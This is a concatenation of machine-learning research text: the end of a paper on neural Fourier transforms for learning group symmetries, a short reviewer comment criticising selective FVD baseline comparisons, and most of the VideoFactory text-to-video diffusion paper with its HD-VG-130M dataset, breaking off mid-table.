g-NFT with various maximum frequencies $l_{\text{max}}$. Bottom Left: Prediction errors of g-NFT. Right: Classification accuracy of linear probe, compared against autoencoder (AE), SimCLR (Chen et al., 2020), the invariant autoencoder (IAE) (Winter et al., 2022) and supervised model including $C_n$ steerable CNN (Cohen and Welling, 2017) and $SO(2)$ steerable CNN (Weiler et al., 2018). Each line is the mean of the accuracy over 10 seeds, with the shaded area being the standard deviation. composition of filters that preferentially choose the frequencies that are relevant to the task used in the training, so that the model learns G-linear maps that are overfitted to classify the rotMNIST dataset. Also see Appendix E for rotMNIST with more challenging condition involving occlusion. Learning 3D Structure from 2D Rendering. We also applied g-NFT to the novel view synthesis from a single 2D rendering of a 3D object. This is a challenging task because it cannot be formulated as pixel-based transformation — in all renderings, the rear side of the object is always occluded. We used three datasets: ModelNet10-SO3 (Liao et al., 2019) in $64 \times 64$ resolution, BRDFs (Greff et al., 2022) ($224 \times 224$), and ABO-Material (Collins et al., 2022) ($224 \times 224$). Each dataset contains multiple 2D images rendered from different camera positions. We trained the autoencoder with the same procedure as for MNIST, except that we used Wigner D matrix representations of $SO(3)$ with $l_{\text{max}} = 4$. We used Vision Transformer (Dosovitskiy et al., 2021) to model $\Phi$ and $\Psi$. The prediction results (Fig. 8) demonstrate that g-NFT accurately predicts the 2D rendering of 3D rotation. We also studied each frequency component by masking out all other frequencies before decoding the latent. Please also see the rendered movie in the Supplementary material. Note that 0-th frequency (F0) captures the features invariant to rotation, such as color. F1 (second row) captures the orientation information, and higher frequencies extract symmetries of the object shapes. For example, F3 depicts triangle-like shapes having rotational symmetry of degree 3, similar to the spherical harmonics decomposition done in 3D space (Fig. 18). See Appendix D for details. 6 RELATED WORKS AND DISCUSSIONS As a tool in equivariant deep learning, group convolution (GC) has been extensively studied (Cohen and Welling, 2017; Cohen et al., 2019; Krizhevsky et al., 2012). NFT differs from GC as well as FT in that it does not assume $g$ to act linearly on the input. In the words of (Kondor and Trivedi, 2018), FT and GC assume that each instance $x \in X$ is a function defined on homogeneous space, or the copy of the acting group modulo the stabilizers. These methods must install the explicit knowledge of the group structure into the model architecture (Finzi et al., 2021). --- 2 We used $SO(2)$ representation for BRDFs however, since its camera positions have a fixed elevation. Figure 8: Novel view synthesis from a single image of a test object that is unseen during training (from left to right: ModelNet, BRDFs, ABO). From bottom to top, we show ground truth, g-NFT prediction, and the decoder output with $k$-th frequency only. As for ABO, the same backgrounds were repeatedly used for both training and test datasets. (Burkhardt [2007]) have used group invariant kernel, but limited their scope to situations similar to FT. When the action is linear, our philosophy of G-NFT also shares much in common with (Cohen and Welling [2014]). As other efforts to find the symmetry under nonlinear actions, (Dupont et al. [2020]) took the approach of mapping the input to the latent space of volumetric form and applying the linear rotation operation on the voxels, yielding an instance of g-NFT. (Shakerinava et al. [2022]) uses different types of invariants (polynomial) that are specific to group/family of groups, instead of linearized group actions in the form of representations. (Falorsi et al. [2018]) maps the observations to the matrix group of $SO(3)$ itself. (Park et al. [2022]) first maps the input to an intermediate latent space with a blackbox function and then applies the convolution of known symmetry for contrastive learning. Finally, Koopman operator (Brunton et al. [2022]) is closely related to the philosophy of NFT in that it linearizes a single nonlinear dynamic, but NFT differs in that it seeks the latent linear transitions with structures (e.g frequencies) that are specific to group. Most relevant to this work, (Miyato et al. [2022]) presents an implementation of U-NFT and uses it to disentangle the modes of actions. However, they do not present other versions of NFT (g-NFT, G-NFT) and, most importantly, neither provide the theoretical foundations that guarantee the identifiability nor establish the "learning of linearized equivariance" as an extension of Fourier Transform. By formally connecting the Fourier analysis with their results, the current work has shown that the contextual disentanglement that was often analyzed in the framework of probabilistic generative model (Zhang et al. [2020], Kim and Mnih [2018]) or the direct product of groups (Higgins et al. [2018], Yang et al. [2021]) may be described in terms of Fourier frequency as well. To our knowledge, we are the first of a kind in providing a formal theory for seeking the linear representations on the dataset with group symmetries defined with nonlinear actions. 7 LIMITATIONS AND FUTURE WORK As stated in Sec 3.1, NFT requires a dataset consisting of (short) tuples because it needs to observe the transition in order to learn the equivariance hidden in nonlinear actions; this might be a practical limitation. Also, although NFT can identify the major frequencies of data-specific symmetry, it does not identifiably preserve the norms in the latent space and hence the size of the coefficient in each frequency, because the scale of $\Phi$ is undecided. Finally, while NFT is a framework for which we have provided theoretical guarantees of existence and identifiability in general cases, the work remains to establish an algorithm that is guaranteed to find the solution to eq. (3). As stated in (Miyato et al. [2022]), the proof has not been completed to assure that the AE loss of Sec 3.1 can find the optimal solution, and resolving this problem is a future work of great practical importance. REFERENCES T. Akiba, S. Sano, T. Yanase, T. Ohta, and M. Koyama. Optuna: A next-generation hyperparameter optimization framework. In SIGKDD, page 2623–2631, 2019. S. L. Brunton, M. Budisic, E. Kaiser, and J. N. Kutz. Modern Koopman theory for dynamical systems. SIAM Review, 64(2):229–340, 2022. doi: 10.1137/21M1401243. URL https://doi.org/10.1137/21M1401243. T. Ceccherini-Silberstein, F. Scarabotti, and F. Tolli. Harmonic Analysis of finite groups. Cambridge University Press, 2007. G. Cesa, L. Lang, and M. Weiler. A program to build E(N)-equivariant steerable CNNs. In International Conference on Learning Representations, 2022. URL https://openreview.net/forum?id=WE4ge9xlnQw. H. Chen, S. Liu, W. Chen, H. Li, and R. Hill. Equivariant point network for 3D point cloud analysis. In CVPR, pages 14514–14523, 2021. T. Chen, S. Kornblith, M. Norouzi, and G. Hinton. A simple framework for contrastive learning of visual representations. In ICML, pages 1597–1607, 2020. T. Clanuwat, M. Bober-Irizar, A. Kitamoto, A. Lamb, K. Yamamoto, and D. Ha. Deep learning for classical japanese literature. arXiv preprint arXiv:1812.01718, 2018. M. Clausen and U. Baum. Fast Fourier Transforms. Wissenschaftsverlag, 1993. T. Cohen and M. Welling. Learning the irreducible representations of commutative lie groups. In ICML, pages 1755–1763, 2014. T. Cohen and M. Welling. Group equivariant convolutional networks. In ICML, pages 2990–2999, 2016. T. Cohen, M. Geiger, and M. Weiler. A general theory of equivariant CNNs on homogeneous spaces. NeurIPS, 36, 2019. T. S. Cohen and M. Welling. Steerable CNNs. ICLR, 2017. T. S. Cohen, M. Geiger, and M. Weiler. Intertwiners between induced representations (with applications to the theory of equivariant neural networks). arXiv preprint arXiv:1803.10743, 2018. J. Collins, S. Goel, K. Deng, A. Luthra, L. Xu, E. Gundogdu, X. Zhang, T. F. Yago Vicente, T. Dideriksen, H. Arora, M. Guillaumin, and J. Malik. ABO: Dataset and benchmarks for real-world 3D object understanding. CVPR, 2022. defisheye Contributors. defisheye. https://pypi.org/project/defisheye/ 2019. [Software]. A. Dosovitskiy, L. Beyer, A. Kolesnikov, D. Weissenborn, X. Zhai, T. Unterthiner, M. Dehghani, M. Minderer, G. Heigold, S. Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In ICLR, 2021. E. Dupont, M. A. Bautista, A. Colburn, A. Sankar, C. Guestrin, J. Susskind, and Q. Shan. Equivariant neural rendering. ICML, 2020. L. Falorsi, P. de Haan, T. R. Davidson, N. De Cao, M. Weiler, P. Forré, and T. S. Cohen. Explorations in homeomorphic variational auto-encoding. arXiv preprint arXiv:1807.04689, 2018. M. Finzi, M. Welling, and A. G. Wilson. A practical method for constructing equivariant multilayer perceptrons for arbitrary matrix groups. ICML, 2021. G. B. Folland. A Course in Abstract Harmonic Analysis. Taylor and Francis, 1994. ISBN 9780849384905. W. Fulton and J. Harris. Representation Theory: A First Course. Springer New York, 1991. ISBN 9780387974958. URL https://books.google.co.jp/books?id=6GUH8ARxhp8C. K. Greff, F. Belletti, L. Beyer, C. Doersch, Y. Du, D. Duckworth, D. J. Fleet, D. Gnanapragasam, F. Golemo, C. Herrmann, T. Kipf, A. Kundu, D. Lagun, I. Laradji, H.-T. D. Liu, H. Meyer, Y. Miao, D. Nowrouzzahrai, C. Oztireli, E. Pot, N. Radwan, D. Rebbain, S. Sabour, M. S. M. Sajjadi, M. Sela, V. Sitzmann, A. Stone, D. Sun, S. Vora, Z. Wang, T. Wu, K. M. Yi, F. Zhong, and A. Tagliasacchi. Kubric: a scalable dataset generator. In CVPR, 2022.
dUDwK38MVC
- When comparing FVDs on UCF-101, the paper included many previous works — but only if their FVD score is higher: https://paperswithcode.com/sota/video-generation-on-ucf-101. In this way, it omitted Make-A-Video, VDIM, LVDM, etc. despite comparing it in other regards. I do not see how it could be justified.
VIDEOFACTORY: SWAP ATTENTION IN SPATIOTEMPORAL DIFFUSIONS FOR TEXT-TO-VIDEO GENERATION Anonymous authors Paper under double-blind review ABSTRACT We present VideoFactory, an innovative framework for generating high-quality open-domain videos. VideoFactory excels in producing high-definition (1376×768), widescreen (16:9) videos without watermarks, creating an engaging user experience. Generating videos guided by text instructions poses significant challenges, such as modeling the complex relationship between space and time, and the lack of large-scale text-video paired data. Previous approaches extend pretrained text-to-image generation models by adding temporal 1D convolution/attention modules for video generation. However, these approaches overlook the importance of jointly modeling space and time, inevitably leading to temporal distortions and misalignment between texts and videos. In this paper, we propose a novel approach that strengthens the interaction between spatial and temporal perceptions. In particular, we utilize a swapped cross-attention mechanism in 3D windows that alternates the “query” role between spatial and temporal blocks, enabling mutual reinforcement for each other. To fully unlock model capabilities for high-quality video generation, we curate a large-scale video dataset called HD-VG-130M. This dataset comprises 130 million text-video pairs from the open-domain, ensuring high-definition, widescreen and watermark-free characters. Objective metrics and user studies demonstrate the superiority of our approach in terms of per-frame quality, temporal correlation, and text-video alignment, with clear margins. 1 INTRODUCTION Automated video production is experiencing a surge in demand across various industries, including media, gaming, film, and television [Joshi et al., 2017; Menapace et al., 2021]. This increased demand has propelled video generation research to the forefront of deep generative modeling, leading to rapid advancements in the field [Ho et al., 2022b; Mathieu et al., 2016; Saito et al., 2017; Tulyakov et al., 2018; Wondrick et al., 2016]. In recent years, diffusion models [Ho et al., 2020] have demonstrated remarkable success in generating visually appealing images in open-domains [Rombach et al., 2022; Ramesh et al., 2022b; Podell et al., 2023]. Building upon such success, in this paper, we take one step further and aim to extend their capabilities to high-quality text-to-video generation. As is widely known, the development of open-domain text-to-video models poses grand challenges, due to the limited availability of large-scale text-video paired data and the complexity of constructing space-time models from scratch. To solve the challenges, current approaches are primarily built on pretrained image generation models. These approaches typically adopt space-time separable architectures, where spatial operations are inherited from the image generation model [Ho et al., 2022b; Hong et al., 2022]. To further incorporate temporal modeling, various strategies have been employed, including pseudo-3D modules [Singer et al., 2022; Zhou et al., 2022], serial 2D and 1D blocks [Blattmann et al., 2023; Ho et al., 2022a], and parameter-free techniques like temporal shift [An et al., 2023] or tailored spatiotemporal attention [Wu et al., 2023; Khachatryan et al., 2023b]. However, these approaches overlook the crucial interplay between time and space for visually engaging text-to-video generation. On one hand, parameter-free approaches rely on manually designed rules that fail to capture the intrinsic nature of videos and often lead to the generation of unnatural motions. On the other hand, learnable 2D+1D modules and blocks primarily focus on temporal modeling, either directly feeding temporal features to spatial features, or combining them through simplistic element-wise additions. This limited interactivity usually results in temporal... distortions and discrepancies between the input texts and the generated videos, which hinders the overall quality and coherence of the generated content. To address the above issues, we take one step further in this paper which highlights the complementary nature of both spatial and temporal features in videos. Specifically, we propose a novel Swapped spatiotemporal Cross-Attention (Swap-CA) for text-to-video generation. Instead of solely relying on separable 2D+1D self-attention (Bertasius et al., 2021) or 3D window self-attention (Liu et al., 2022) that replace computationally expensive 3D self-attention as shown in Fig. 1(a)-(c), we aim to further enhance the interaction between spatial and temporal features. As shown in Fig. 1(d), our swap attention mechanism facilitates bidirectional guidance between spatial and temporal features by considering one feature as the query and the other as the key/value. To ensure the reciprocity of information flow, we also swap the role of the "query" in adjacent layers. By deeply interplaying spatial and temporal features through the proposed swap attention, we present a holistic VideoFactory framework for text-to-video generation. In particular, we adopt the latent diffusion framework and design a spatiotemporal U-Net for 3D noise prediction. To unlock the full potential of the proposed model and fulfill high-quality video generation, we construct the largest video generation dataset, named HD-VG-130M. This dataset consists of 130 million text-video pairs from open-domains, encompassing high-definition, widescreen, and watermark-free characters. Additionally, our spatial super-resolution model can effectively upsample videos to a resolution of $1376 \times 768$, thus ensuring engaging visual experience. We conduct comprehensive experiments and show that our approach outperforms existing methods in terms of both quantitative and qualitative comparisons. In summary, our paper makes the following significant contributions: - We reveal the significance of learning joint spatial and temporal features for video generation, and introduce a novel Swap-CA mechanism to reinforce both space and time interactions. It significantly improves the generation quality, while ensuring precisely semantic alignment between the input text and the generated videos. - We curate a comprehensive dataset comprising the largest 130 million text-video pairs to-date, which is the first to support high-quality video generation with high-definition, widescreen, and watermark-free characters. We believe this dataset will greatly benefit fellow researchers and advance the field of video generation.\footnote{Anonymous preview: Google Drive. It will be fully released upon the acceptance of our submission.} ## 2 RELATED WORKS **Text-to-Image Generation.** Generating realistic images from corresponding descriptions combines the challenging components of language modeling and image generation. Traditional text-to-image generation methods (Mansimov et al., 2016; Reed et al., 2016; Xu et al., 2018; Zhang et al., 2017) are mainly based on GANs (Goodfellow et al., 2014) and are only able to model simple scenes such as birds (Wah et al., 2011). Later work (Ramesh et al., 2021; Ding et al., 2021) extends the scope of text-to-image generation to open domains with better modeling techniques and training data on much larger scales. In recent years, diffusion models have shown great ability in visual generation (Dhariwal & Nichol, 2021). For text-to-image multi-modality generation, GLIDE (Nichol et al., 2021), DALL-E 2 (Ramesh et al., 2022a), and Imagen (Saharia et al., 2022) leverage diffusion models to achieve impressive results. Based on these successes, some work extends latent diffusion (Rombach et al., 2022), customization (Ruiz et al., 2023), image guidance (Yang et al., 2023), and precise control (Balaji et al., 2022). This paper further extends diffusion models for video generation. **Text-to-Video Generation.** Additional controls are often added to make the generated videos more responsive to demand (Mathieu et al., 2016; Pan et al., 2017; Wang et al., 2018), and this paper focuses on the controlling mode of texts. Early text-to-video generation models (Li et al., 2018; Pan et al., 2017) mainly use convolutional GAN models with Recurrent Neural Networks (RNNs) to model temporal motions. Although complex architectures and auxiliary losses are introduced, GAN-based models cannot generate videos beyond simple scenes like moving digits and close-up actions. Recent works extend text-to-video to open domains with large-scale transformers (Yu et al., 2022a) or diffusion models (Ho et al., 2022a). Considering the difficulty of high-dimensional video modeling and the scarcity of text-video datasets, training text-to-video generation from scratch is unaffordable. As a result, most works acquire knowledge from pretrained text-to-image models. CogVideo (Hong et al., 2022) inherits from a pretrained text-to-image model CogView2 (Ding et al., 2022). Imagen Video (Ho et al., 2022a) and Phenaki (Villegas et al., 2022) adopt joint image-video training. Make-A-Video (Singer et al., 2022) learns motion on video data alone, eliminating the dependency on text-video data. To reduce the high cost of video generation, latent diffusion has been widely utilized for video generation (An et al., 2023; Blattmann et al., 2023; Esser et al., 2023; He et al., 2022b,a; Khachatryan et al., 2023a; Ma et al., 2023; Wu et al., 2022, 2023; Yu et al., 2023; Zhou et al., 2022). MagicVideo (Zhou et al., 2022) inserts a simple adaptor after the 2D convolution layer. Latent-Shift (An et al., 2023) adopts a parameter-free temporal shift module to exchange information across different frames. PDVM (Yu et al., 2023) projects the 3D video latent into three 2D image-like latent spaces. Although the research on text-to-video generation is very active, existing research ignores the inter and inner correlation between spatial and temporal modules. In this paper, we revisit the design of text-driven video generation. ### 3 HIGH-DEFINITION VIDEO GENERATION DATASET Datasets of diverse text-video pairs are the prerequisite for training open-domain text-to-video generation models. However, existing text-video datasets are always limited in either scale or quality, thus hindering the upper bound of high-quality video generation. Referring to Tab. 1, MSR-VTT (Xu et al., 2016) and UCF101 (Soomro et al., 2012) only have 10K and 13K video clips respectively. Although large in scale, HowTo100M (Miech et al., 2019) is specified for instructional videos, which has limited diversity for open-domain generation tasks. Despite being appropriate in both scale and domain, the formats of textual annotations in HD-VILA-100M (Xue et al., 2022) are subtitle transcripts, which lack visual contents related descriptions for high-quality video generation. Additionally, the videos in HD-VILA-100M have complex scene transitions, which are disadvantageous for models to learn temporal correlations. WebVid-10M (Bain et al., 2021) has been used in some previous video generation works (Ho et al., 2022a; Singer et al., 2022), considering its relatively large-scale (10M) and descriptive captions. Nevertheless, videos in WebVid-10M are of low resolution and have poor visual qualities with watermarks in the center. To tackle the problems above and achieve high-quality video generation, we propose a large-scale text-video dataset, namely **HD-VG-130M**, including 130M text-video pairs from open-domain in high-definition (720p), widescreen and watermark-free formats. We first collect high-definition videos from YouTube. The challenge lies in converting raw HD videos into video-caption pairs, which is far from straightforward. As the original videos have complex scene transitions which are adverse for models to learn temporal correlations, we detect and split scenes in these original videos using PySceneDetect (Breakthrough), resulting in 130M single scene video clips. Finally, we caption video clips with BLIP-2 (Li et al., 2023), in view of its large vision-language pre-training knowledge. To be specific, we extract the central frame in each clip as the keyframe, and get the annotation for each clip by captioning the keyframe with BLIP-2 (Li et al., 2023). Note that the video clips in HD-VG-130M are in single scenes, which ensures that the keyframe captions are representative enough to describe the content of the whole clips in most circumstances. The statistics of HD-VG-130M are shown in Fig. 2. The videos in HD-VG-130M cover 15 categories. The wide range of domains is beneficial for Table 1: Comparison of different video datasets. Existing text-video datasets are always limited in either scale or quality, while our HD-VG-130M includes 130M text-video pairs from open-domain in high-definition, widescreen format, devoid of scene transitions, and free from watermarks. Captions are premium-quality text labels for videos. In contrast, class labels tend to be overly simplistic, and subtitles do not synchronize with the visual contents of the video. | Dataset | Video clips | Resolution | Domain | Text | Transition-free | Watermark-free | |------------------|-------------|------------|--------------|----------|-----------------|----------------| | MSR-VTT (2016) | 10K | 240p | open | caption | ✓ | ✓ | | UCF101 (2012) | 13K | 240p | human action | class label | ✓ | ✓ | | HowTo100M (2019) | 136M | 240p | instructional | subtitle | × | ✓ | | HD-VILA-100M (2022) | 103M | 720p | open | subtitle | × | ✓ | | WebVid-10M (2021) | 10M | 360p | open | caption | ✓ | × | | HD-VG-130M (Ours) | 130M | 720p | open | caption | ✓ | ✓ | Figure 2: Statistics of video categories, clip durations, and caption word lengths in HD-VG-130M. HD-VG-130M covers a wide range of video categories. Training the models to generate diverse content. After scene detection, the video clips are mostly in single scenes with duration less than 20 seconds. The textual annotations are visual contents related to descriptive captions, which are mostly around 10 words. Text-video examples of our HD-VG-130M can be found in Figs. 9–10 in the appendix. 4 High-Quality Text-to-Video Generation Spatiotemporal Inter-Connection. To reduce computational costs and leverage pretrained image generation models, space-time separable architectures have gained popularity in text-to-video generation [Ho et al., 2022b; Hong et al., 2022]. These architectures handle spatial operations independently on each frame, while temporal operations consider multiple frames for each spatial position. In the following, we refer to the features predicted by 2D/spatial modules in space-time separable networks as “spatial features”, and “temporal features” vice versa. The quality of spatiotemporal features is important for video generation, as it can affect temporal consistency and text-content alignment performance [Hong et al., 2022; Ho et al., 2022a]. The interaction between spatial and temporal features is also essentially, as it determines how the spatial and temporal features are combined. This interaction has been highlighted in previous video-related studies [Bertasius et al., 2021; Zeng et al., 2020] and verified in cross-modality learning [Gu et al., 2023; Ruan et al., 2023]. However, as discussed in Sec. 1, prior works have neglected the crucial interaction between spatial and temporal features. To tackle this limitation, we promote the mutual reinforcement of these features through a series of cross-attention operations. Denote a basic operation CrossAttention$(x, y) = \text{softmax}(\frac{QK^T}{\sqrt{d}}) \cdot V$, with $$Q = W_Q^{(i)} \cdot x, \quad K = W_K^{(i)} \cdot y, \quad V = W_V^{(i)} \cdot y,$$ where $W_Q^{(i)}, W_K^{(i)},$ and $W_V^{(i)}$ are learnable projection matrices in the $i$-th layer. The direction of cross-attention, specifically whether $Q$ originates from spatial or temporal features, plays a decisive role in determining the impact of cross-attention. In general, spatial features tend to encompass a greater amount of contextual information, which can improve the alignment of temporal features with the input text. On the other hand, temporal features have a complete receptive field of the time series, which may enable spatial features to generate visual content more effectively. To leverage both aspects effectively, we propose a strategy of swapping the roles of $Q$ and $K, V$ in adjacent two blocks. This approach ensures that both temporal and spatial features receive sufficient information from the other modality, enabling a comprehensive and mutually beneficial interaction. Global attention greatly increases the computational costs in terms of memory and running time. To improve efficiency, we conduct 3D window attention. Given a video feature in the shape of $F \times H \times W$ and a 3D window size of $F_w \times H_w \times W_w$, we organize the windows to process the feature in a non-overlapping manner, leading to $\lceil \frac{F}{F_w} \rceil \times \lceil \frac{H}{H_w} \rceil \times \lceil \frac{W}{W_w} \rceil$ distinct 3D windows. Within each window, we perform spatiotemporal cross-attention. By adopting the 3D window scheme, we effectively reduce computational costs without compromising performance. Following prior text-to-image arts (Blattmann et al., 2023; Rombach et al., 2022), we incorporate $2\times$ down/upsampling along the spatial dimension to establish a hierarchical structure. Furthermore, research (Habibian et al., 2019; Pessoa et al., 2020) has pointed out that the temporal dimension is sensitive to compression. In light of these considerations, we do compress the temporal dimension and conduct shift windows (Liu et al., 2022), which advocates an inductive bias of locality. On the spatial dimension, we do not shift since the down/upsampling already introduces connections between neighboring non-overlapping 3D windows. To this end, we propose a Swapped spatiotemporal Cross-Attention (Swap-CA) in 3D windows. Let $t^l$ and $s^l$ represent the predictions of 2D and 1D modules. We utilize Multi-head Cross Attention (MCA) to compute their interactions by Swap-CA as $$\hat{s}^l = \text{Proj}_{in}^l \odot \text{GN}(s^l), \quad \hat{t}^l = \text{Proj}_{in}^l \odot \text{GN}(t^l);$$ $$h^l = 3\text{DW-MCA}(\text{LN}(\hat{s}^l), \text{LN}(\hat{t}^l)) + \hat{s}^l;$$ $$\bar{h}^l = \text{FFN} \odot \text{LN}(h^l) + h^l;$$ $$z^l = t^l + s^l + \text{Swap-CA}(s^l, t^l) = t^l + s^l + \text{Proj}_{out}^l(\bar{h}^l),$$ where GN, Proj, LN, 3D Window-based Multi-head Cross-Attention (3DW-MCA) are learnable modules. By initializing the output projection $\text{Proj}_{out}^{l-1}$ by zero, we have $z^l = t^{l-1} + s^{l-1}$, i.e., Swap-CA is skipped so that it is reduced to a basic addition operation. This allows us to initially train the diffusion model using addition operations, significantly speeding up the training process. Subsequently, we can switch to Swap-CA to enhance the model’s performance. Then for the next spatial-temporal separable block, we apply shifted 3D window multi-head cross-attention (3DSW-MCA) and interchange the roles of $s$ and $t$, as $$h^{l+1} = 3\text{DSW-MCA}(\text{LN}(\hat{t}^{l+1}), \text{LN}(\hat{s}^{l+1})) + \hat{t}^{l+1}.$$ In all 3DSW-MCA, we shift the window along the temporal dimension by $\lceil \frac{F_w}{2} \rceil$ elements. Table 2: Ablation study on spatiotemporal interaction strategies. We report the FVD (Unterthiner et al., 2018) and CLIPSIM (Radford et al., 2021) on 1K samples from the WebVid-10M (Bain et al., 2021) validation set. Computational cost is evaluated on inputs of shape $4 \times 16 \times 32 \times 32$. Details can be found in the appendix. $T$ and $S$ represent spatial and temporal features, respectively. | Attention Type | $Q$ | $K$, $V$ | Param. (G) | Mem. (GB) | Time (ms) | FVD ↓ | CLIPSIM ↑ | |----------------|-----|----------|------------|-----------|-----------|-------|---------| | - | - | - | 1.480 | 9.37 | 135.35 | 566.16| 0.3070 | | Global | $T$ | $S$ | 1.601 | 22.96 | 202.12 | 555.35| 0.3091 | | | $S$ | $T$ | 1.601 | 22.96 | 205.00 | 496.25| 0.3073 | | Swapped | $T$ | $S$ | 1.601 | 22.96 | 201.51 | 485.86| 0.3092 | | 3D Window | $S$ | $T$ | 1.601 | 9.83 | 150.49 | 563.12| 0.3086 | | | $T$ | $S$ | 1.601 | 9.83 | 149.93 | 490.60| 0.3076 | | Swapped | $T$ | $S$ | 1.601 | 9.83 | 148.24 | 475.09| 0.3107 | **Overall Architecture.** We adopt LDM (Rombach et al., 2022) as the text-to-image backbone. We employ an auto-encoder to compress the video into a down-sampled 3D latent space. Within this latent space, we perform diffusion optimization using an hourglass spatial-temporal separable U-Net model. Text features are extracted with a pretrained CLIP (Radford et al., 2021) model and inserted into the U-Net model through cross-attention on the spatial dimension. Our framework is illustrated in Fig. 3. To balance performance and efficiency, we use Swap-CA only at the end of each U-Net encoder and decoder block. In other positions, we employ a straightforward fusion technique using a $1 \times 1 \times 1$ convolution to merge spatial and temporal features. To enhance the connectivity among temporal modules, we introduce skip connections that connect temporal modules separated by spatial down/upsampling modules. This strategy promotes stronger integration and information flow within the temporal dimension of the network architecture. **Super-Resolution Towards Higher Quality.** To obtain visually satisfying results, we further perform Super-Resolution (SR) on the generated video. One key to improving SR performance is designing a degradation model that closely resembles the actual degradation process (Wang et al., 2021). In our scenario, the generated video quality suffers from both the diffusion and auto-encoder processes. Therefore, we adopt the hybrid degradation model in Real-ESRGAN (Wang et al., 2021) to simulate possible quality degradation caused by the generated process. During training, an original video frame is downsampled and degraded using our model, and the SR network attempts to perform SR on the resulting low-resolution image. We adopt RCAN (Zhang et al., 2018) with 8 residual blocks as our SR network. It is trained with a vanilla GAN (Goodfellow et al., 2014) to improve visual satisfaction. With a suitable degradation design, our SR network can further reduce possible artifacts and distortion in the frames, increase their resolution, and improve their visual quality. ## 5 EXPERIMENTS ### 5.1 IMPLEMENTATION DETAILS Our model predicts images at a resolution of $344 \times 192$ (with a latent space resolution of $43 \times 24$). Then a $4 \times$ upscaling is produced in our SR model, resulting in a final output resolution of $1376 \times 768$. Our model is trained with 32 NVIDIA V100 GPUs. We utilize our HD-VG-130M as training data to promote the generation visual qualities. Furthermore, considering that the textual captions in HD-VG-130M are annotated by BLIP-2 (Li et al., 2023), which may have some discrepancies with human expressions, we adopt a joint training strategy with WebVid-10M (Bain et al., 2021) to ensure the model could generalize well to diverse humanity textual inputs. This approach allows us to benefit from the large-scale text-video pairs and the superior visual qualities of HD-VG-130M while maintaining the generalization ability to diverse textual inputs in real scenarios, enhancing the overall training process. More details can be found in the appendix. ### 5.2 ABLATION STUDIES **Spatiotemporal Inter-Connection.** We first evaluate the design of our swapped cross-attention mechanism. As shown in Tab. 2, using temporal features as $Q$ generally leads to better CLIP similarity (CLIPSIM) (Radford et al., 2021), revealing a better text-video alignment. The reason might be that language cross-attention only exists in spatial modules. Thus, using spatial features to guide temporal ones implicitly enhance semantic guidance. Conversely, using spatial as Q leads to significantly better FVD, revealing better video quality. The reason might be that the spatial features can better perceive the overall video by using temporal features as guidance. This experiment demonstrates the benefits of introducing cross-attention, as well as the different acts of spatial and temporal features. Combining these two aspects, we propose to swap the roles of x and y every two blocks. In this way, both the temporal and spatial features can get sufficient information from the other modality, leading to improved FVD and CLIPSIM scores. 3D window attention not only significantly lowers computational costs but also leads to a slight performance improvement. Previous studies (Li et al., 2021; Wang et al., 2022) have observed similar performance improvements by integrating a module to enhance local information within transformer-like structures. We conduct comparisons with other attention strategies in Tab. 3. We re-implement these designs within our framework. Specifically, 3D spatial-temporal WSA is realized by first adding spatial and temporal features together and then applying 3D window self-attention. All other settings remain consistent with Tab. 2. The custom attention mechanism utilized in the one-shot model, Tune-A-Video, appears to be less effective in the open-domain setting. While CogVideo and 3D spatial-temporal WSA surpass the baseline, they bring less performance improvement compared with our Swap-CA, showing the effectiveness of our approach. For additional subjective results and evaluation regarding different window sizes, please consult Sec. E.1 and Sec. E.2 in the appendix due to space limitations. **High-Definition Video Generation Dataset.** The advantages of HD-VG-130M extend beyond watermark removal. As shown in Fig. 4, training with HD-VG-130M not only eliminates watermarks but also elevates the scenic beauty and enriches the level of detail, leading to a comprehensive improvement in the visual quality of the generated videos. This improvement is further reflected in a 10% decrease in FVD: 475.09 for “w/o HD-VG-130M” and 429.75 for “w/ HD-VG-130M”. We also tried using E2FGVI (Li et al., 2022) to remove watermarks from WebVid-10M. As shown in Fig. 5, the generated videos have blurry textures. Removing watermarks from WebVid-10M to produce high-quality video data is non-trivial, which reveals the significance of our HD-VG-130M. We further evaluated different captioning models. We experimented with a state-of-the-art video captioning model, mPLUG-2 (Xu et al., 2023), but observed that it provides less detailed descriptions (e.g., BLIP-2 predicts “black coat” while mPLUG-2 does not in the first row of Fig. 6) or misinterprets the scene (e.g., mistakes the dog to be inside the cage in the second row of Fig. 6). As a result, using videos captioned with mPLUG-2, the CLIPSIM is decreased to 0.3046. Finally, we assessed the impact of training with HD-VILA-100M (Xue et al., 2022) instead of HD-VG-130M. As HD-VILA-100M only provides subtitles and lacks scene detection (with potential multiple transitions), significant performance degradation is observed in FVD (429.75 → 692.99) and CLIPSIM (0.3082 → 0.2671), despite joint training with WebVid. This experiment highlights the crucial role of our scene detection and video captioning procedures. | Methods | FVD ↓ | CLIPSIM ↑ | |-------------------------|-------|-----------| | Baseline | 566.16| 0.3070 | | Tune-A-Video (2023) | 717.34| 0.3084 | | CogVideo (2022) | 534.48| 0.3010 | | 3D Spatial-Temporal WSA | 500.49| 0.3072 | | Swap-CA (Ours) | 475.09| 0.3107 | Table 4: Text-to-video generation on UCF101. Our VideoFactory surpasses the SoTA method (Video LDM) by 25%. | Method | Zero-shot | FVD↓ | |-----------------|-----------|------| | VideoGPT | No | 2880.6 | | MoCoGAN | No | 2886.8 | | +StyleGAN2 | No | 1821.4 | | MoCoGAN-HD | No | 1729.6 | | DIGAN | No | 1630.2 | | StyleGAN-V | No | 1431.0 | | PVDM | No | 343.6 | | CogVideo | Yes | 701.6 | | MagicVideo | Yes | 699.0 | | LVDM | Yes | 641.8 | | ModelScope | Yes | 639.9 | | Video LDM | Yes | 550.6 | | Ours | Yes | 410.0 | Table 5: Text-to-video generation on MSR-VTT. | Method | Zero-shot | CLIPSIM↑ | |-----------------|-----------|----------| | GODIVA | No | 0.2402 | | NUWA | No | 0.2439 | | LVDM | Yes | 0.2381 | | CogVideo | Yes | 0.2631 | | ModelScope | Yes | 0.2795 | | Video LDM | Yes | 0.2929 | | Ours | Yes | **0.3005** | Table 6: Text-to-video generation on WebVid. We beat the SoTA method by 29% in FVD. | Method | FVD↓ | CLIPSIM↑ | |-----------------|----------|----------| | LVDM | 455.53 | 0.2751 | | ModelScope | 414.11 | 0.3000 | | Ours | **292.35** | **0.3070** | Table 7: User Preference. The number indicates the percentage of humans that prefer our method over the compared method. We also show the ratio of the network parameter v.s. Ours. | Sample | Method | Param Ratio | Video Quality | Text-Video | Overall | |-----------------|-------------------------|-------------|---------------|------------|---------| | Pretrained Model| ModelScope [Luo et al., 2023] | 0.90× 